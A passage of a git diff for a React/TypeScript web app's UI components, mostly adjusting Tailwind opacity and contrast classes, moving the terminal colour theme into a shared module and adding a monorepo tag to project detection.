+                className="select-none pr-4 text-right text-muted-foreground align-top"
                 style={{ minWidth: `${gutterWidth + 1}ch` }}
               >
                 {i + 1}
@@ -313,7 +313,7 @@ function MarkdownViewer({ content, filepath, shikiTheme = "github-dark-default"
             },
             img({ src, alt }) {
               return (
-                <span className="my-2 block rounded border border-border bg-muted/20 px-3 py-2 text-xs text-muted-foreground italic">
+                <span className="my-2 block rounded border border-border bg-muted/50 px-3 py-2 text-xs text-muted-foreground italic">
                   🖼 {alt || (typeof src === "string" ? src : "") || "image"}
                 </span>
               )
@@ -485,7 +485,7 @@ function InlineDiffViewer({ before, after, onDismiss }: { before: string; after:
                   "select-none pr-3 text-right align-top min-w-[3ch]",
                   line.type === "add" ? "text-emerald-400/40" :
                   line.type === "remove" ? "text-red-400/40" :
-                  "text-muted-foreground/30",
+                  "text-muted-foreground/50",
                 )}
               >
                 {line.lineNum ?? ""}
@@ -495,8 +495,8 @@ function InlineDiffViewer({ before, after, onDismiss }: { before: string; after:
                   "whitespace-pre pr-4",
                   line.type === "add" && "text-emerald-300",
                   line.type === "remove" && "text-red-300 line-through decoration-red-400/30",
-                  line.type === "context" && line.text === "···" && "text-muted-foreground/30 text-center italic",
-                  line.type === "context" && line.text !== "···" && "text-muted-foreground/70",
+                  line.type === "context" && line.text === "···" && "text-muted-foreground/50 text-center italic",
+                  line.type === "context" && line.text !== "···" && "text-muted-foreground",
                 )}
               >
                 {line.text || " "}
diff --git a/web/components/gsd/focused-panel.tsx b/web/components/gsd/focused-panel.tsx
index e2a17c1b1..ee5c79156 100644
--- a/web/components/gsd/focused-panel.tsx
+++ b/web/components/gsd/focused-panel.tsx
@@ -82,7 +82,7 @@ function SelectRenderer({
           {request.options.map((option) => (
             <label
               key={option}
-              className="flex cursor-pointer items-center gap-3 rounded-lg border border-border/70 bg-background/70 px-3 py-2.5 transition-colors hover:bg-accent/40"
+              className="flex cursor-pointer items-center gap-3 rounded-lg border border-border bg-background px-3 py-2.5 transition-colors hover:bg-accent/40"
             >
               <Checkbox
                 checked={multiValues.has(option)}
@@ -115,7 +115,7 @@ function SelectRenderer({
         {request.options.map((option) => (
           <label
             key={option}
-            className="flex cursor-pointer items-center gap-3 rounded-lg border border-border/70 bg-background/70 px-3 py-2.5 transition-colors hover:bg-accent/40"
+            className="flex cursor-pointer items-center gap-3 rounded-lg border border-border bg-background px-3 py-2.5 transition-colors hover:bg-accent/40"
           >
             <RadioGroupItem value={option} id={`select-${option}`} />
             <Label htmlFor={`select-${option}`} className="cursor-pointer text-sm font-normal">
@@ -145,7 +145,7 @@ function ConfirmRenderer({
 }) {
   return (
     <div className="space-y-4">
-      <div className="rounded-lg border border-border/70 bg-background/70 px-4 py-3 text-sm leading-relaxed">
+      <div className="rounded-lg border border-border bg-background px-4 py-3 text-sm leading-relaxed">
         {request.message}
       </div>
       <div className="flex gap-3">
diff --git a/web/components/gsd/knowledge-captures-panel.tsx b/web/components/gsd/knowledge-captures-panel.tsx
index 1e224724a..57291a3dd 100644
--- a/web/components/gsd/knowledge-captures-panel.tsx
+++ b/web/components/gsd/knowledge-captures-panel.tsx
@@ -53,7 +53,7 @@ function PanelHeader({
   return (
     <div className="flex items-center justify-between gap-3 pb-4">
       <div className="flex items-center gap-2.5">
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">{title}</h3>
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">{title}</h3>
         {status}
         {subtitle && <span className="text-[11px] text-muted-foreground">{subtitle}</span>}
       </div>
@@ -84,7 +84,7 @@ function PanelLoading({ label }: { label: string }) {
 
 function PanelEmpty({ message }: { message: string }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-4 py-5 text-center text-xs text-muted-foreground">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-4 py-5 text-center text-xs text-muted-foreground">
       {message}
     </div>
   )
@@ -97,7 +97,7 @@ function StatPill({ label, value, variant }: { label: string; value: number | st
       variant === "error" && "border-destructive/20 bg-destructive/5 text-destructive",
       variant === "warning" && "border-warning/20 bg-warning/5 text-warning",
       variant === "info" && "border-info/20 bg-info/5 text-info",
-      (!variant || variant === "default") && "border-border/40 bg-card/50 text-foreground/80",
+      (!variant || variant === "default") && "border-border/50 bg-card/50 text-foreground/80",
     )}>
       <span className="text-muted-foreground">{label}</span>
       <span className="font-medium tabular-nums">{value}</span>
@@ -181,12 +181,12 @@ const CLASSIFICATION_OPTIONS: Classification[] = ["quick-task", "inject", "defer
 function KnowledgeEntryRow({ entry }: { entry: KnowledgeEntry }) {
   const badge = knowledgeTypeBadge(entry.type)
   return (
-    <div className="group rounded-lg border border-border/30 bg-card/20 px-3 py-2.5 transition-colors hover:bg-card/40">
+    <div className="group rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 transition-colors hover:bg-card/50">
       <div className="flex items-start gap-2.5">
         <KnowledgeTypeIcon type={entry.type} className="mt-0.5" />
         <div className="min-w-0 flex-1">
           <div className="flex items-center gap-2">
-            <span className="text-xs font-medium text-foreground/90 truncate">{entry.title}</span>
+            <span className="text-xs font-medium text-foreground truncate">{entry.title}</span>
             <Badge variant="outline" className={cn("text-[10px] px-1.5 py-0 h-4 shrink-0", badge.className)}>
               {badge.label}
             </Badge>
@@ -231,7 +231,7 @@ function KnowledgeTabContent({
         ))}
       </div>
       {data.lastModified && (
-        <p className="pt-2 text-[10px] text-muted-foreground/60">
+        <p className="pt-2 text-[10px] text-muted-foreground">
           Last modified: {new Date(data.lastModified).toLocaleString()}
         </p>
       )}
@@ -255,7 +255,7 @@ function CaptureEntryRow({
   const status = captureStatusStyle(entry.status)
 
   return (
-    <div className="group rounded-lg border border-border/30 bg-card/20 px-3 py-2.5 transition-colors hover:bg-card/40">
+    <div className="group rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 transition-colors hover:bg-card/50">
       <div className="flex items-start gap-2.5">
         <div className={cn(
           "mt-1 h-2 w-2 shrink-0 rounded-full",
@@ -265,24 +265,24 @@ function CaptureEntryRow({
         )} />
         <div className="min-w-0 flex-1">
           <div className="flex items-center gap-2 flex-wrap">
-            <span className="text-xs text-foreground/90">{entry.text}</span>
+            <span className="text-xs text-foreground">{entry.text}</span>
             <Badge variant="outline" className={cn("text-[10px] px-1.5 py-0 h-4 shrink-0", status.className)}>
               {status.label}
             </Badge>
             {entry.classification && (
-              <Badge variant="outline" className="text-[10px] px-1.5 py-0 h-4 shrink-0 border-border/40 text-muted-foreground">
+              <Badge variant="outline" className="text-[10px] px-1.5 py-0 h-4 shrink-0 border-border/50 text-muted-foreground">
                 {classificationLabel(entry.classification)}
               </Badge>
             )}
           </div>
           {entry.timestamp && (
-            <div className="mt-1 flex items-center gap-1 text-[10px] text-muted-foreground/60">
+            <div className="mt-1 flex items-center gap-1 text-[10px] text-muted-foreground">
               <Clock className="h-2.5 w-2.5" />
               {entry.timestamp}
             </div>
           )}
           {entry.resolution && (
-            <p className="mt-1 text-[10px] text-muted-foreground/70 italic">{entry.resolution}</p>
+            <p className="mt-1 text-[10px] text-muted-foreground italic">{entry.resolution}</p>
           )}
           {entry.status === "pending" && (
             <div className="mt-2 flex flex-wrap gap-1">
@@ -294,7 +294,7 @@ function CaptureEntryRow({
                   size="sm"
                   disabled={resolvePending}
                   onClick={() => onResolve(entry.id, c)}
-                  className="h-6 gap-1 px-2 text-[10px] font-normal border-border/40 hover:bg-foreground/5"
+                  className="h-6 gap-1 px-2 text-[10px] font-normal border-border/50 hover:bg-foreground/5"
                 >
                   <ClassificationIcon classification={c} />
                   {classificationLabel(c)}
@@ -397,7 +397,7 @@ export function KnowledgeCapturesPanel({ initialTab }: KnowledgeCapturesPanelPro
   return (
     <div className="space-y-0">
       {/* Tab bar */}
-      <div className="flex items-center gap-0.5 border-b border-border/30 px-1">
+      <div className="flex items-center gap-0.5 border-b border-border/50 px-1">
         <button
           type="button"
           onClick={() => setActiveTab("knowledge")}
@@ -405,7 +405,7 @@ export function KnowledgeCapturesPanel({ initialTab }: KnowledgeCapturesPanelPro
             "flex items-center gap-1.5 px-3 py-2 text-xs font-medium transition-all border-b-2 -mb-px",
             activeTab === "knowledge"
               ? "border-foreground/60 text-foreground"
-              : "border-transparent text-muted-foreground hover:text-foreground/70",
+              : "border-transparent text-muted-foreground hover:text-muted-foreground",
           )}
         >
           <BookOpen className="h-3.5 w-3.5" />
@@ -418,7 +418,7 @@ export function KnowledgeCapturesPanel({ initialTab }: KnowledgeCapturesPanelPro
             "flex items-center gap-1.5 px-3 py-2 text-xs font-medium transition-all border-b-2 -mb-px",
             activeTab === "captures"
               ? "border-foreground/60 text-foreground"
-              : "border-transparent text-muted-foreground hover:text-foreground/70",
+              : "border-transparent text-muted-foreground hover:text-muted-foreground",
           )}
         >
           <InboxIcon className="h-3.5 w-3.5" />
diff --git a/web/components/gsd/loading-skeletons.tsx b/web/components/gsd/loading-skeletons.tsx
index c6a445fc3..a99462e62 100644
--- a/web/components/gsd/loading-skeletons.tsx
+++ b/web/components/gsd/loading-skeletons.tsx
@@ -129,7 +129,7 @@ interface DashboardSkeletonProps {
 
 export function DashboardMetricsSkeleton({ icons }: DashboardSkeletonProps) {
   return (
-    <div className="grid gap-4 md:grid-cols-2 xl:grid-cols-5">
+    <div className="grid gap-4 md:grid-cols-2 xl:grid-cols-4 2xl:grid-cols-5">
       <CurrentUnitCardSkeleton icon={icons.Activity} />
       <MetricCardSkeleton label="Elapsed Time" icon={icons.Clock} />
       <MetricCardSkeleton label="Total Cost" icon={icons.DollarSign} />
diff --git a/web/components/gsd/main-session-terminal.tsx b/web/components/gsd/main-session-terminal.tsx
index a176e10d0..95216badc 100644
--- a/web/components/gsd/main-session-terminal.tsx
+++ b/web/components/gsd/main-session-terminal.tsx
@@ -7,6 +7,7 @@ import { cn } from "@/lib/utils"
 import { validateImageFile } from "@/lib/image-utils"
 import { buildProjectAbsoluteUrl, buildProjectPath } from "@/lib/project-url"
 import { authFetch, appendAuthParam } from "@/lib/auth"
+import { getXtermOptions, getXtermTheme } from "@/lib/xterm-theme"
 import "@xterm/xterm/css/xterm.css"
 
 type XTerminal = import("@xterm/xterm").Terminal
@@ -23,75 +24,6 @@ const MIN_INITIAL_ATTACH_HEIGHT = 120
 const MIN_INITIAL_ATTACH_COLS = 20
 const MIN_INITIAL_ATTACH_ROWS = 8
 
-const XTERM_DARK_THEME = {
-  background: "#0a0a0a",
-  foreground: "#e4e4e7",
-  cursor: "#e4e4e7",
-  cursorAccent: "#0a0a0a",
-  selectionBackground: "#27272a",
-  selectionForeground: "#e4e4e7",
-  black: "#18181b",
-  red: "#ef4444",
-  green: "#22c55e",
-  yellow: "#eab308",
-  blue: "#3b82f6",
-  magenta: "#a855f7",
-  cyan: "#06b6d4",
-  white: "#e4e4e7",
-  brightBlack: "#52525b",
-  brightRed: "#f87171",
-  brightGreen: "#4ade80",
-  brightYellow: "#facc15",
-  brightBlue: "#60a5fa",
-  brightMagenta: "#c084fc",
-  brightCyan: "#22d3ee",
-  brightWhite: "#fafafa",
-} as const
-
-const XTERM_LIGHT_THEME = {
-  background: "#f5f5f5",
-  foreground: "#1a1a1a",
-  cursor: "#1a1a1a",
-  cursorAccent: "#f5f5f5",
-  selectionBackground: "#d4d4d8",
-  selectionForeground: "#1a1a1a",
-  black: "#1a1a1a",
-  red: "#dc2626",
-  green: "#16a34a",
-  yellow: "#ca8a04",
-  blue: "#2563eb",
-  magenta: "#9333ea",
-  cyan: "#0891b2",
-  white: "#e4e4e7",
-  brightBlack: "#71717a",
-  brightRed: "#ef4444",
-  brightGreen: "#22c55e",
-  brightYellow: "#eab308",
-  brightBlue: "#3b82f6",
-  brightMagenta: "#a855f7",
-  brightCyan: "#06b6d4",
-  brightWhite: "#fafafa",
-} as const
-
-function getXtermTheme(isDark: boolean) {
-  return isDark ? XTERM_DARK_THEME : XTERM_LIGHT_THEME
-}
-
-function getXtermOptions(isDark: boolean, fontSize?: number) {
-  return {
-    cursorBlink: true,
-    cursorStyle: "bar" as const,
-    fontSize: fontSize ?? 13,
-    fontFamily: "'SF Mono', 'Cascadia Code', 'Fira Code', Menlo, Monaco, 'Courier New', monospace",
-    lineHeight: 1.35,
-    letterSpacing: 0,
-    theme: getXtermTheme(isDark),
-    allowProposedApi: true,
-    scrollback: 10000,
-    convertEol: false,
-  }
-}
-
 function getAttachableTerminalSize(container: HTMLDivElement | null, terminal: XTerminal | null): { cols: number; rows: number } | null {
   if (!container || !terminal) return null
 
@@ -451,7 +383,7 @@ export function MainSessionTerminal({ className, fontSize, projectCwd }: MainSes
       )}
       {/* Drop overlay */}
       {isDragOver && (
-        <div className="absolute inset-0 z-20 flex flex-col items-center justify-center gap-2 bg-background/80 backdrop-blur-sm border-2 border-dashed border-primary rounded-md pointer-events-none">
+        <div className="absolute inset-0 z-20 flex flex-col items-center justify-center gap-2 bg-background backdrop-blur-sm border-2 border-dashed border-primary rounded-md pointer-events-none">
           <ImagePlus className="h-8 w-8 text-primary" />
           <span className="text-sm font-medium text-primary">Drop image here</span>
         </div>
diff --git a/web/components/gsd/onboarding-gate.tsx b/web/components/gsd/onboarding-gate.tsx
index 13ea3e10c..936e698c6 100644
--- a/web/components/gsd/onboarding-gate.tsx
+++ b/web/components/gsd/onboarding-gate.tsx
@@ -180,7 +180,7 @@ export function OnboardingGate() {
 
         {/* Right — step label */}
         <div className="flex w-24 justify-end">
-          <span className="text-xs text-muted-foreground/60">{stepLabel}</span>
+          <span className="text-xs text-muted-foreground">{stepLabel}</span>
         </div>
       </header>
 
diff --git a/web/components/gsd/onboarding/step-authenticate.tsx b/web/components/gsd/onboarding/step-authenticate.tsx
index eaa562890..6788c34f9 100644
--- a/web/components/gsd/onboarding/step-authenticate.tsx
+++ b/web/components/gsd/onboarding/step-authenticate.tsx
@@ -228,7 +228,7 @@ export function StepAuthenticate({
 
         {/* ─── API key form ─── */}
         {hasApiKey && !canProceed && (
-          <div className="space-y-3 rounded-xl border border-border/40 bg-card/30 p-4">
+          <div className="space-y-3 rounded-xl border border-border/50 bg-card/50 p-4">
             <div className="text-sm font-medium text-foreground">API key</div>
             <form
               className="space-y-3"
@@ -276,15 +276,15 @@ export function StepAuthenticate({
             {/* Divider between API key and OAuth */}
             {hasApiKey && (
               <div className="flex items-center gap-3 py-1">
-                <div className="h-px flex-1 bg-border/40" />
-                <span className="text-xs text-muted-foreground/50">or</span>
-                <div className="h-px flex-1 bg-border/40" />
+                <div className="h-px flex-1 bg-border/50" />
+                <span className="text-xs text-muted-foreground">or</span>
+                <div className="h-px flex-1 bg-border/50" />
               </div>
             )}
 
             {/* ─── No active flow: show start button ─── */}
             {!flowActive && (
-              <div className="rounded-xl border border-border/40 bg-card/30 p-4">
+              <div className="rounded-xl border border-border/50 bg-card/50 p-4">
                 <div className="flex items-center justify-between gap-3">
                   <div>
                     <div className="text-sm font-medium text-foreground">Browser sign-in</div>
@@ -316,7 +316,7 @@ export function StepAuthenticate({
                 initial={{ opacity: 0, y: 8 }}
                 animate={{ opacity: 1, y: 0 }}
                 transition={{ duration: 0.3 }}
-                className="rounded-xl border border-border/40 bg-card/30 p-4 space-y-4"
+                className="rounded-xl border border-border/50 bg-card/50 p-4 space-y-4"
                 data-testid="onboarding-active-flow"
               >
                 {/* Device code — big and prominent */}
@@ -326,12 +326,12 @@ export function StepAuthenticate({
                     <button
                       type="button"
                       onClick={() => copyCode(deviceCode)}
-                      className="group flex items-center gap-3 rounded-lg border border-border/60 bg-background/50 px-5 py-3 transition-colors hover:border-foreground/20 active:scale-[0.98]"
+                      className="group flex items-center gap-3 rounded-lg border border-border bg-background/50 px-5 py-3 transition-colors hover:border-foreground/20 active:scale-[0.98]"
                     >
                       <span className="font-mono text-2xl font-bold tracking-[0.15em] text-foreground">
                         {deviceCode}
                       </span>
-                      <span className="text-muted-foreground/40 transition-colors group-hover:text-muted-foreground">
+                      <span className="text-muted-foreground transition-colors group-hover:text-muted-foreground">
                         {copied ? (
                           <CheckCircle2 className="h-4 w-4 text-success" />
                         ) : (
@@ -339,7 +339,7 @@ export function StepAuthenticate({
                         )}
                       </span>
                     </button>
-                    <div className="text-[11px] text-muted-foreground/50">
+                    <div className="text-[11px] text-muted-foreground">
                       {copied ? "Copied!" : "Click to copy"}
                     </div>
                   </div>
@@ -402,7 +402,7 @@ export function StepAuthenticate({
                       size="sm"
                       onClick={() => onCancelFlow(activeFlow.flowId)}
                       disabled={isBusy}
-                      className="h-7 text-xs text-muted-foreground/60"
+                      className="h-7 text-xs text-muted-foreground"
                     >
                       Cancel
                     </Button>
@@ -412,7 +412,7 @@ export function StepAuthenticate({
                 {/* Generic prompt input (non-device-code) */}
                 {activeFlow.prompt && !deviceCode && (
                   <form
-                    className="space-y-2 border-t border-border/30 pt-3"
+                    className="space-y-2 border-t border-border/50 pt-3"
                     onSubmit={(e) => {
                       e.preventDefault()
                       if (!activeFlow.prompt?.allowEmpty && !flowInput.trim()) return
@@ -446,9 +446,9 @@ export function StepAuthenticate({
 
                 {/* Progress messages */}
                 {activeFlow.progress.length > 0 && (
-                  <div className="space-y-1 border-t border-border/30 pt-3">
+                  <div className="space-y-1 border-t border-border/50 pt-3">
                     {activeFlow.progress.map((message, i) => (
-                      <div key={`${activeFlow.flowId}-${i}`} className="text-xs text-muted-foreground/60">
+                      <div key={`${activeFlow.flowId}-${i}`} className="text-xs text-muted-foreground">
                         {message}
                       </div>
                     ))}
@@ -461,7 +461,7 @@ export function StepAuthenticate({
 
         {/* OAuth unavailable */}
         {provider.supports.oauth && !provider.supports.oauthAvailable && !hasApiKey && (
-          <div className="rounded-xl border border-border/40 bg-card/30 px-4 py-3.5 text-sm text-muted-foreground">
+          <div className="rounded-xl border border-border/50 bg-card/50 px-4 py-3.5 text-sm text-muted-foreground">
             Browser sign-in is not available in this runtime. Go back and choose a provider with API-key support.
           </div>
         )}
diff --git a/web/components/gsd/onboarding/step-dev-root.tsx b/web/components/gsd/onboarding/step-dev-root.tsx
index 449636ec6..eb45d9660 100644
--- a/web/components/gsd/onboarding/step-dev-root.tsx
+++ b/web/components/gsd/onboarding/step-dev-root.tsx
@@ -72,9 +72,9 @@ function InlineFolderBrowser({
   }, [browse])
 
   return (
-    <div className="rounded-xl border border-border/40 bg-card/20 overflow-hidden">
+    <div className="rounded-xl border border-border/50 bg-card/50 overflow-hidden">
       {/* Current path */}
-      <div className="flex items-center justify-between gap-2 border-b border-border/30 px-4 py-2.5">
+      <div className="flex items-center justify-between gap-2 border-b border-border/50 px-4 py-2.5">
         <p className="min-w-0 truncate font-mono text-xs text-muted-foreground" title={currentPath}>
           {currentPath}
         </p>
@@ -123,7 +123,7 @@ function InlineFolderBrowser({
                 >
                   <Folder className="h-3.5 w-3.5 shrink-0 text-muted-foreground" />
                   <span className="min-w-0 flex-1 truncate text-foreground">{entry.name}</span>
-                  <ChevronRight className="h-3 w-3 shrink-0 text-muted-foreground/30 opacity-0 transition-opacity group-hover:opacity-100" />
+                  <ChevronRight className="h-3 w-3 shrink-0 text-muted-foreground/50 opacity-0 transition-opacity group-hover:opacity-100" />
                 </button>
               ))}
 
@@ -138,7 +138,7 @@ function InlineFolderBrowser({
       </ScrollArea>
 
       {/* Cancel */}
-      <div className="border-t border-border/30 px-4 py-2">
+      <div className="border-t border-border/50 px-4 py-2">
         <Button
           type="button"
           variant="ghost"
@@ -306,7 +306,7 @@ export function StepDevRoot({ onNext, onBack }: StepDevRootProps) {
                       "active:scale-[0.96]",
                       path === suggestion
                         ? "border-foreground/25 bg-foreground/10 text-foreground"
-                        : "border-border/40 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
+                        : "border-border/50 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
                     )}
                   >
                     {suggestion}
@@ -337,7 +337,7 @@ export function StepDevRoot({ onNext, onBack }: StepDevRootProps) {
           <Button
             variant="ghost"
             onClick={onNext}
-            className="gap-1.5 text-muted-foreground/70 transition-transform active:scale-[0.96]"
+            className="gap-1.5 text-muted-foreground transition-transform active:scale-[0.96]"
             data-testid="onboarding-devroot-skip"
           >
             Skip
diff --git a/web/components/gsd/onboarding/step-mode.tsx b/web/components/gsd/onboarding/step-mode.tsx
index ec6afa796..c2f7a2e61 100644
--- a/web/components/gsd/onboarding/step-mode.tsx
+++ b/web/components/gsd/onboarding/step-mode.tsx
@@ -82,7 +82,7 @@ export function StepMode({ selected, onSelect, onNext, onBack }: StepModeProps)
                 "active:scale-[0.98]",
                 isSelected
                   ? "border-foreground/30 bg-foreground/[0.06] shadow-[0_0_0_1px_rgba(255,255,255,0.06)]"
-                  : "border-border/50 bg-card/30 hover:border-foreground/15 hover:bg-card/60",
+                  : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
               )}
               data-testid={`onboarding-mode-${opt.id}`}
             >
@@ -141,7 +141,7 @@ export function StepMode({ selected, onSelect, onNext, onBack }: StepModeProps)
                 <span
                   className={cn(
                     "ml-2 text-xs font-medium transition-colors duration-200",
-                    isSelected ? "text-foreground/50" : "text-muted-foreground/50",
+                    isSelected ? "text-muted-foreground" : "text-muted-foreground",
                   )}
                 >
                   {opt.tagline}
@@ -149,7 +149,7 @@ export function StepMode({ selected, onSelect, onNext, onBack }: StepModeProps)
               </div>
 
               {/* Description */}
-              <p className="mt-2 text-[13px] leading-relaxed text-muted-foreground/80">
+              <p className="mt-2 text-[13px] leading-relaxed text-muted-foreground">
                 {opt.description}
               </p>
             </button>
diff --git a/web/components/gsd/onboarding/step-optional.tsx b/web/components/gsd/onboarding/step-optional.tsx
index bf2e53280..eaa2215d1 100644
--- a/web/components/gsd/onboarding/step-optional.tsx
+++ b/web/components/gsd/onboarding/step-optional.tsx
@@ -64,7 +64,7 @@ export function StepOptional({ sections, onBack, onNext }: StepOptionalProps) {
               "flex items-start gap-3.5 rounded-xl border px-4 py-3.5 transition-colors",
               section.configured
                 ? "border-success/15 bg-success/[0.03]"
-                : "border-border/40 bg-card/20",
+                : "border-border/50 bg-card/50",
             )}
             data-testid={`onboarding-optional-${section.id}`}
           >
@@ -74,7 +74,7 @@ export function StepOptional({ sections, onBack, onNext }: StepOptionalProps) {
                 "mt-0.5 flex h-5 w-5 shrink-0 items-center justify-center rounded-full",
                 section.configured
                   ? "bg-success/15 text-success"
-                  : "bg-foreground/[0.05] text-muted-foreground/40",
+                  : "bg-foreground/[0.05] text-muted-foreground",
               )}
             >
               {section.configured ? (
@@ -95,7 +95,7 @@ export function StepOptional({ sections, onBack, onNext }: StepOptionalProps) {
                         "text-[10px]",
                         section.configured
                           ? "border-success/15 text-success/70"
-                          : "border-border/40 text-muted-foreground/50",
+                          : "border-border/50 text-muted-foreground",
                       )}
                     >
                       {section.configured ? "Ready" : "Skipped"}
@@ -115,7 +115,7 @@ export function StepOptional({ sections, onBack, onNext }: StepOptionalProps) {
                     <Badge
                       key={item}
                       variant="outline"
-                      className="border-border/30 text-[10px] text-muted-foreground/60"
+                      className="border-border/50 text-[10px] text-muted-foreground"
                     >
                       {item}
                     </Badge>
@@ -124,7 +124,7 @@ export function StepOptional({ sections, onBack, onNext }: StepOptionalProps) {
               )}
 
               {section.configuredItems.length === 0 && (
-                <p className="mt-0.5 text-xs text-muted-foreground/50">
+                <p className="mt-0.5 text-xs text-muted-foreground">
                   Not configured — add later from settings.
                 </p>
               )}
diff --git a/web/components/gsd/onboarding/step-project.tsx b/web/components/gsd/onboarding/step-project.tsx
index 128da87e7..6eeba3696 100644
--- a/web/components/gsd/onboarding/step-project.tsx
+++ b/web/components/gsd/onboarding/step-project.tsx
@@ -33,6 +33,7 @@ interface ProjectDetectionSignals {
   hasCargo?: boolean
   hasGoMod?: boolean
   hasPyproject?: boolean
+  isMonorepo?: boolean
 }
 
 interface ProjectProgressInfo {
@@ -64,6 +65,7 @@ const KIND_STYLE: Record<ProjectDetectionKind, { label: string; color: string; i
 
 function techStack(signals: ProjectDetectionSignals): string[] {
   const tags: string[] = []
+  if (signals.isMonorepo) tags.push("Monorepo")
   if (signals.hasGitRepo) tags.push("Git")
   if (signals.hasPackageJson) tags.push("Node.js")
   if (signals.hasCargo) tags.push("Rust")
@@ -248,7 +250,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
         )}
 
         {noDevRoot && (
-          <div className="rounded-xl border border-border/40 bg-card/30 px-4 py-6 text-center text-sm text-muted-foreground">
+          <div className="rounded-xl border border-border/50 bg-card/50 px-4 py-6 text-center text-sm text-muted-foreground">
             No dev root configured. Go back and set one, or finish setup to configure later.
           </div>
         )}
@@ -278,7 +280,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                     "active:scale-[0.98]",
                     isSwitching
                       ? "border-foreground/30 bg-foreground/[0.06]"
-                      : "border-border/40 bg-card/20 hover:border-foreground/15 hover:bg-card/50",
+                      : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
                     switchingTo && !isSwitching && "opacity-40 pointer-events-none",
                   )}
                 >
@@ -288,7 +290,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                     project.kind === "active-gsd" ? "bg-success/10" : "bg-foreground/[0.04]",
                   )}>
                     {isSwitching ? (
-                      <Loader2 className="h-4 w-4 animate-spin text-foreground/60" />
+                      <Loader2 className="h-4 w-4 animate-spin text-muted-foreground" />
                     ) : (
                       <KindIcon className={cn("h-4 w-4", style.color)} />
                     )}
@@ -310,7 +312,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                         {stack.map((tag) => (
                           <span
                             key={tag}
-                            className="rounded bg-foreground/[0.04] px-1.5 py-0.5 text-[10px] text-muted-foreground/60"
+                            className="rounded bg-foreground/[0.04] px-1.5 py-0.5 text-[10px] text-muted-foreground"
                           >
                             {tag}
                           </span>
@@ -320,7 +322,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
 
                     {/* Row 3: progress info (for active-gsd projects) */}
                     {progress && (
-                      <div className="mt-1.5 text-[11px] text-muted-foreground/50">
+                      <div className="mt-1.5 text-[11px] text-muted-foreground">
                         {progress}
                       </div>
                     )}
@@ -336,7 +338,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                             }}
                           />
                         </div>
-                        <span className="text-[10px] tabular-nums text-muted-foreground/40">
+                        <span className="text-[10px] tabular-nums text-muted-foreground">
                           {milestoneCount}
                         </span>
                       </div>
@@ -344,7 +346,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                   </div>
 
                   {/* Arrow */}
-                  <ArrowRight className="mt-1 h-4 w-4 shrink-0 text-muted-foreground/20 transition-all group-hover:text-muted-foreground/60 group-hover:translate-x-0.5" />
+                  <ArrowRight className="mt-1 h-4 w-4 shrink-0 text-muted-foreground/50 transition-all group-hover:text-muted-foreground group-hover:translate-x-0.5" />
                 </button>
               )
             })}
@@ -352,7 +354,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
         )}
 
         {!loading && devRoot && projects.length === 0 && !error && (
-          <div className="rounded-xl border border-border/40 bg-card/30 px-4 py-6 text-center text-sm text-muted-foreground">
+          <div className="rounded-xl border border-border/50 bg-card/50 px-4 py-6 text-center text-sm text-muted-foreground">
             No projects found in {devRoot}
           </div>
         )}
@@ -367,7 +369,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                 disabled={!!switchingTo}
                 className={cn(
                   "flex w-full items-center gap-3.5 rounded-xl border border-dashed px-4 py-3.5 text-left transition-all duration-200",
-                  "border-border/40 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
+                  "border-border/50 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
                   "active:scale-[0.98]",
                   switchingTo && "opacity-40 pointer-events-none",
                 )}
@@ -377,7 +379,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                 </div>
                 <div>
                   <span className="text-sm font-medium">Create new project</span>
-                  <p className="mt-0.5 text-[11px] text-muted-foreground/50">Initialize a new directory with Git</p>
+                  <p className="mt-0.5 text-[11px] text-muted-foreground">Initialize a new directory with Git</p>
                 </div>
               </button>
             ) : (
@@ -385,7 +387,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                 initial={{ opacity: 0, height: 0 }}
                 animate={{ opacity: 1, height: "auto" }}
                 transition={{ duration: 0.2 }}
-                className="rounded-xl border border-border/40 bg-card/30 p-4 space-y-3"
+                className="rounded-xl border border-border/50 bg-card/50 p-4 space-y-3"
               >
                 <div className="text-sm font-medium text-foreground">New project</div>
                 <form
@@ -411,7 +413,7 @@ export function StepProject({ onFinish, onBack, onBeforeSwitch }: StepProjectPro
                     <p className="text-xs text-destructive">{createError}</p>
                   )}
                   {newName && nameValid && !nameConflict && (
-                    <p className="font-mono text-xs text-muted-foreground/40">{devRoot}/{newName}</p>
+                    <p className="font-mono text-xs text-muted-foreground">{devRoot}/{newName}</p>
                   )}
                   <div className="flex items-center gap-2 pt-1">
                     <Button
diff --git a/web/components/gsd/onboarding/step-provider.tsx b/web/components/gsd/onboarding/step-provider.tsx
index 8292c9329..6882943a4 100644
--- a/web/components/gsd/onboarding/step-provider.tsx
+++ b/web/components/gsd/onboarding/step-provider.tsx
@@ -79,7 +79,7 @@ export function StepProvider({ providers, selectedId, onSelect, onNext, onBack }
       >
         {groups.map((group) => (
           <div key={group.label}>
-            <div className="mb-2 px-0.5 text-[11px] font-medium uppercase tracking-widest text-muted-foreground/50">
+            <div className="mb-2 px-0.5 text-[11px] font-medium uppercase tracking-widest text-muted-foreground">
               {group.label}
             </div>
             <div className="grid gap-2 sm:grid-cols-2">
